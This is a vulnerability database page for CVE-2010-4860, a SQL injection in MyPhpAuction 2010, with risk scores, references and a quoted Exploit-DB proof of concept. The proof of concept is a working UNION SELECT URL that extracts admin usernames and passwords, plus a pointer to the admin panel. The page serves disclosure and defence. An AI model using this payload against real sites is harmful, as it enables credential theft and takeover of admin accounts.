CVE-2010-4860
high
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
8.5
Description
SQL injection vulnerability in product_desc.php in MyPhpAuction 2010 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
MyPhpAuction 2010 - 'id' SQL Injection
==
# Title: MyPhpAuction 2010 (id) Remote SQL Injection Vuln
# Version: 2010
# Link: http://galaxyscriptz.com/products/MyPhpAuction-2010.html
==
# Author: BorN To K!LL - h4ck3r
# Contact: SQL@hotmail.co.uk
==
# 3xploit:
/product_desc.php?id=-5+union+all+select+1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
then get username & password n then go to the admin panel ,,
# Admin Panel:
/admin
# Greetings:
Dr.2 , Inject0r's Community , AsbMay's Group , darkc0de team , and all ma friends ,,
==
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| galaxyscriptz | myphpauction | 2010 | |
References
- http://packetstormsecurity.org/1009-exploits/myphpauction-sql.txt
- http://securityreason.com/securityalert/8418
- http://www.exploit-db.com/exploits/15154
- https://exchange.xforce.ibmcloud.com/vulnerabilities/62144
- http://packetstormsecurity.org/1009-exploits/myphpauction-sql.txt
- http://securityreason.com/securityalert/8418
- http://www.exploit-db.com/exploits/15154
- https://exchange.xforce.ibmcloud.com/vulnerabilities/62144
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.